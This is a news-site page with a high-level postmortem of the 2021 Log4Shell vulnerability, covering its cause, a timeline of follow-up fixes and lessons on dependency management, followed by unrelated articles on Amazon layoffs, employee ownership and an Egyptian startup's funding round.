Connect with us


The Log4Shell vulnerability: A postmortem



This article was contributed by Ariel Assaraf, CEO of Coralogix 

The Log4shell vulnerability was a fitting, panicked end to what was already a difficult year. Now that the initial panic is out of the way, and there are some tried and tested methods for detecting and mitigating the vulnerability — it is essential to stop and reflect on just what happened in those last few weeks of 2021. Specifically, to reflect on what went well and what could have gone better. What better way to do that than with a postmortem?

Overview & impact of the Log4shell vulnerability

The Log4shell vulnerability was a weakness in the JNDI lookup functionality of Log4j2, between version 2.0 and 2.14. This allowed an attacker, who had control over what was printed in the logs (for example, if the server prints out an HTTP header), to execute whatever code they liked.

Log4j2 is ubiquitous among applications and the libraries on which they depend, meaning that many applications were utilizing Log4j2 without realizing it. Even applications not written in Java often are hosted in web containers, meaning that a project can have no apparent dependency on Log4j2 and still be exposed. This resulted in a massive impact across nearly ever industries.

The root cause of the Log4shell vulnerability

The root cause was not a single event for an issue like this. The original feature made its way into the release without security scrutiny. The core contributors to Log4j2 have, no doubt, been reflecting on how they can improve their security assessment processes.

Libraries like Log4j2 are also large and complex, meaning that the vast majority of teams were not using the vulnerable JNDI lookup functionality. This malicious code made its way in because of the monolithic nature of these dependencies. A more composable approach to Log4j2 functionality might have significantly reduced the potential impact of the Log4j2 vulnerability. Still, it would have come at the cost of ease of use for those engineers who did depend on it.

So, what went well?

The response from the industry regarding the Log4shell vulnerability was immediate and effective. Open source communities created resources, drafted blog posts, and implemented patches. This effort enabled organizations to remain ahead of the curve and proactively mitigate problems rather than frantically reacting.

In addition, the core contributors to the Log4j2 library were incredibly diligent in their releases. While it was a bit of a bumpy ride (more on this later), they quickly iterated to a sensible release that was backward compatible with all but the vulnerable functionality.

These positives speak to the elegant beauty of the open source philosophy-focused communities of experts working for of an enormous pool of organizations. Sometimes they make mistakes, much like any engineering effort, but those mistakes are rapidly detected and fixed.

What didn’t go so well?

The obvious problem with the Log4shell vulnerability is the very nature of it. The code was baked into thousands of applications, and each one needed to be mitigated, tested, and deployed into production. For some organizations, this was normal. For others, they were still operating on slow release cycles, and this sudden change would have been a massive disturbance to their way of working.

There was also some confusion about the correct mitigation path during the incident as the understanding of the Log4shell vulnerability grew. Check out the timeline below to get a flavor of this confusion. This meant that organizations that had been proactive were then forced to go back and start again.

Timeline of events

December 9, 2021

The original Log4Shell vulnerability was found. Advice was given to mitigate this issue by setting the LOG4J_FORMAT_MSG_NO_LOOKUPS or setting its corresponding configuration flag. At the same time, version 2.15 was released which disabled this functionality by default.

December 14, 2021

A second vulnerability was found in version 2.15 of Log4j. This was a “denial of service” vulnerability, enabling malicious agents to slow down and ultimately halt targeted systems. The advice changed from setting a configuration value to an upgrade, to the newly released version 2.16. This CVE was initially rated relatively
low, 3.7/10, but was re-scored at 9.8/10, meaning organizations that had made a rather sensible risk-based decision were forced to pivot again and migrate.

December 17, 2021

A third vulnerability was found in version 2.16. This was another “denial of service” attack that had a similar effect to the previous vulnerability. To mitigate this, version 2.17 was released. Because of the relatively high score given to this CVE, 7.5/10, organizations were advised to migrate to version 2.17 as soon as possible.

December 28, 2021

A fourth vulnerability was found in version 2.17. This vulnerability was less severe than its predecessors (6.6/10) and required other parts of the target system to be already compromised. This latest vulnerability required that configuration was being loaded from a remote server, which meant it would not have as broad an impact. This led to the release of 2.17.1.

So what’s next?

There are some serious questions that need to be asked. Firstly, is the method of dependency management fit for purpose in a world of microservices, where the same dependency is copied across dozens, hundreds, or maybe thousands of instances

Secondly, is there a need to migrate to smaller, composable libraries rather than monolithic libraries that bring in a great deal of unwanted functionality? Most of the victims of this vulnerability were not using the JNDI lookup code in the first place. Engineers regularly smuggle in torrents of unnecessary and potentially hazardous code into their binaries, especially for languages like Java that frequently favor significant dependencies that can be heavily configured.

Finally, some measure of acceptance needs to come with these criticisms. Zero-day vulnerabilities will happen. They’re an inevitable result of sharing code, which is undoubtedly worth the risk. Your challenge is to decide what processes, technologies, and tooling you want to put in place to get you through the next one.

The trick is responding quickly, and there are things we can do to raise vulnerabilities to our attention promptly.

  • Automatic Log4shell vulnerability scans

You can use libraries like Snyk to detect vulnerabilities in your dependencies automatically. You can also configure this to automatically fail your CI/CD pipelines if you want to prevent critical vulnerabilities from even being deployed. This is a very firm but powerful mechanism for preventing issues from being released.

The CVE Twitter feed is a great way for you to keep on top of the vulnerabilities as they are released. This may be a lot of information for you to process, but you’ll know the awful ones by all the likes and retweets.

All in all

It was a complex few weeks for engineering teams all over the globe. Still, if this vulnerability has proven anything, the open source community is resilient to failure, extremely responsive, and diligent. While this was a severe vulnerability that will undoubtedly linger for years to come, it was quickly mitigated and contained by the rapid response from a community of focused and diligent engineers.

Ariel Assaraf is CEO of Coralogix

Source link


Amazon may lay off 20,000 employees, including managers: Report



Amazonmay lay off about 20,000 employees across divisions as the company reevaluates its pandemic-induced hiring spree, according to a media report.

A Computerworld report stated that the tech giant could lay off employees across the company, including distribution centre workers, technology staff, and corporate executives. Staff at all levels will likely be affected, it found.

Last month, the New York Times reported that Amazon plans to lay off approximately 10,000 people, and “the cuts will focus on Amazon’s devices organisation, including the voice-assistant Alexa, as well as at its retail division and in human resources”.

However, according to Computerworld, the layoffs could impact nearly double the number of employees– roughly 6% of the company’s corporate employees and about 1.3% of its global workforce of more than 1.5 million composed primarily of hourly workers.

YourStory could not independently verify the report.

Corporate staff have been told that employees will receive a 24-hour notice and severance pay, in accordance with their company contracts, the Computerworld report noted. “There is a sense of fear among employees in the company as the news has come out,” the report added, quoting a source who was informed directly about the layoff effort.

The layoffs would be the largest staff reduction in Amazon’s history.

“There is no specific department or location mentioned for the cuts; it is across the business. We were told this is as a result of over-hiring during the pandemic and the need for cost-cutting as the company’s financials have been on a declining trend,” the source told Computerworld.

After the New York Times report, Amazon Chief Executive Officer Andy Jassy shared some information about role eliminations in a note. Jassy confirmed that layoffs were occurring, though he did not specify the planned number of employees to be laid off.

“Our annual planning process extends into the new year, which means there will be more role reductions as leaders continue to make adjustments. Those decisions will be shared with impacted employees and organisations early in 2023,” Jassy wrote in the message, noting that Amazon had already communicated that layoffs would occur in the Devices and Books businesses, and would be extending a voluntary reduction offer for some employees in the People, Experience, and Technology (PXT) organisation. 

“We haven’t concluded yet exactly how many other roles will be impacted (we know that there will be reductions in our Stores and PXT organisations), but each leader will communicate to their respective teams when we have the details nailed down,” Jassy noted.

Meanwhile, the Computerworld report noted that employees on Amazon’s robotics team have been laid off.

Amazon’s muted third-quarter earnings as well as disappointing fourth-quarter projections led the company’s stock to plummet. Its third-quarter earnings were severely impacted by unpredictable consumer shopping habits and inflation. 

Amazon is likely to lay off several employees in India across divisions, according to media reports. Last month, Amazon confirmed that it will shut down its wholesale unit Amazon Distribution. This is the third business unit to be closed after the e-commerce giant announced the wrapping up of Amazon Academy and the food delivery business in India.

Globally, tech companies have announced layoffs as part of their cost-cutting efforts. In November, Meta CEO Mark Zuckerberg announced that the company had decided to reduce the size of its team by about 13%, cutting over 11,000 jobs. In the same month, Elon Musk reduced half of Twitter’s workforce or about 3,700 jobs at the social media firm.

Source link

Continue Reading


Unlock The Entrepreneurial Potential Of Your Team With Employee-Ownership



A strong team of many outperforms even the most hardworking of entrepreneurs on their own. But when hiring employees, freelancers and contractors, how do you ensure they have the same entrepreneurial skills and drive that you do as your company’s owner? Is it unrealistic to expect employees to be motivated and committed to an organisation they didn’t found?

Nicki Sprinz thinks she has cracked the code of unlocking the entrepreneurial potential of your team, and the answer lies in employee ownership. Sprinz is managing director of B-Corp certified ustwo London, a company of over 200 employees, and cofounder of Ada’s List, an 8000-strong community designed to support women working in the tech industry. ustwo has recently become employee-owned and has already seen the benefits of breaking down the distinction between owners and employees.

According to the Employee Ownership Association, this way of working can improve productivity, support more resilient regional economies and empower team members, resulting in them being far more engaged. Sprinz explained the main benefit for entrepreneurs of this model along with practical tips for managing directors and company founders to make the transition to becoming employee-owned.

Employee ownership protects the company

“Being employee-owned means existing team members, who are now partners, feel empowered as owners,” said Sprinz. She believes that this encourages everyone to put in the work to uphold a strong company culture and course-correct if they see anything awry.

Whilst this might not happen automatically, a founder can make it more likely that their team upholds the vision. Sprinz has put frameworks in place to ensure everyone has a voice. “We hold open firesides, have elected partner representatives on the board, and ensure there are regular channels of communication for all team members to be part of growing the culture and living the values,” she said.

Keeping the team on board means protecting the company. “There are no surprises about the direction we are taking with the business,” explained Sprinz. “We involve everyone in the decisions we make on our projects and ensure we are accountable, both commercially and ethically.”

Attract and retain top talent

In a competitive market, how does your company attract and retain the best talent in the world for the benefit of your clients? Employee-ownership could be the solution. Not only does it make job listings stand out, but it attracts individuals who are like-minded and think long term. They are committed to a future with whichever company they choose to join and are prepared to push themselves to make it happen.

“High quality potential recruits and employees are interested in values and purpose,” said Sprinz. “Being able to talk about employee ownership helps you stand out in a tough hiring market. We have several interview stages so a candidate can get to know us as well as we’d like to know them.”

Sprinz’ interview stages aim to weed out “cultural and value mismatches that ultimately lead to an unfulfilled team.” They ask candidates multiple questions about their values and examples of them in practice, and they encourage candidates to probe with questions about ustwo. They also “publicise the salary for all open roles and candidates have the opportunity to meet other members of the team,” she added.

Control quality

When scaling a business, ambitious entrepreneurs cannot afford to let quality slip. Growth at all costs is a false economy that ends with the business back at square one and having to work harder to undo reputational damage. “A more entrepreneurial team ensures quality stays high,” explained Sprinz. Not only do your team members care deeply about the work they do, they also know they benefit from company growth, so they are incentivised to keep raising the bar.

“If your team is invested in the long term financial success of the company, they also feel pride that their work contributes to overall success,” said Sprinz. “They respond by raising the bar on their work.” Sprinz also believes that, “Regular transparent sharing of financial results and metrics maintains dialogue on personal and company impact.”

Direct the future

An employee-owned company has options for the future. The owner might one day want to step aside or sell, and the company’s succession plan will already be in place. In the meantime, the company has hit new heights and progressed with new ideas because its foundations are solid.

Like Maslow’s Hierarchy of Needs, you cannot reach self-actualisation without warmth and shelter, and a company cannot break through ceilings with constant recruitment issues. When team members are bought into the company, they are bought into its future too, making more certain outcomes for everyone involved.

“The partner representatives on the board surface the priorities of the rest of the team and ensure the conversations of the board are directed accordingly,” explained Sprinz. “The representatives are actively part of the bigger picture and playing a huge part in shaping the company’s future.”

Unlock the entrepreneurial potential of your team by exploring employee ownership, advised Sprinz. The best people will be proud to tell their friends that they are part-owners of the place they work. They will feel valued and listened to and respond with their effort and devotion. Could employee ownership be the right step forward for you?

Continue Reading


With $3M new funding, Egyptian startup OneOrder sets out on growth drive • TechCrunch



OneOrder, Egypt’s supply chain solutions provider for restaurants, has raised $3 million seed funding led by Nclude with participation from A15, and Delivery Hero Ventures. The latest funding brings the total funding raised by the startup to $10.5
million, including $6.5 million working capital financing from financial institutions.

Launched in March this year, OneOrder makes it possible for restaurants to order food supplies through its online platform, solving the fragmented supply chain challenges that lead to erratic prices, waste, quality issues, and storage cost.

By using its platform, restaurants no longer have to deal with tens of suppliers, and can order only what they need, for next day delivery, stemming wastage and doing away with the need for warehouses. The platform also ensures operational efficiency and helps restaurants save money by leveraging OneOrder’s economies of scale.

The startup plans to use the funding to scale its operations in Egypt including increasing its warehouse footprint, and to explore growth opportunities within the Gulf Cooperation Council (GCC) region, and Africa.

“We are exploring Saudi Arabia and expanding south into our continent. I think Africa has a lot of markets that feel the same pain points that Egypt does,” said OneOrder co-founder and CEO, Tamer Amer, who co-founded OneOrder with Karim Maurice (CTO), also founder Cube, an online restaurant-reservation service.

“The solution that we’re providing has shown that this industry is ready for tech solutions…[and] we are working on a more substantial operating system for the restaurants not just the supply chain and inventory management system, rather the full cycle that would turn their operations automatic by using AI and machine learning capabilities to drive the supply chain,” said Amer, a restaurateur for over two decades, initially in the U.S before settling in Egypt from 2008.

Amer, told TechCrunch that the sourcing challenges he experienced operating two restaurants in Egypt — Fuego, a sushi bar, and Longhord Texas Barbeque — inspired the launch of OneOrder, to serve the country’s total addressable market of 400,000 restaurants.

“I had always taken the supply chain in the U.S for-granted; we would order and get the supplies all the time. We didn’t have to worry about shortages or price changes. I realized that Egypt is so underserved and the industry is really doing a lot of things that we shouldn’t be doing,” he said.

“… restaurants should not have a full-time job monitoring the supply chain and procuring products because it takes away focus on the core business, which is serving customers. So that’s where the idea really started,” he said.

OneOrder plans to, through its partners and backed by its extensive data, begin extending working capital financing options to restaurants as a way of helping them scale their operations.

Basil Moftah, the managing partner at Nclude, said: “The product-market fit of the OneOrder solution is very impressive, along with the positive impact it is delivering to all stakeholders in the value chain. Through the use of technology and alternative data, OneOrder’s embedded financing will help underserved clients who are unable to secure traditional financing. This aligns perfectly with our investing philosophy and we are glad to be embarking on this journey with the team.”

Source link

Continue Reading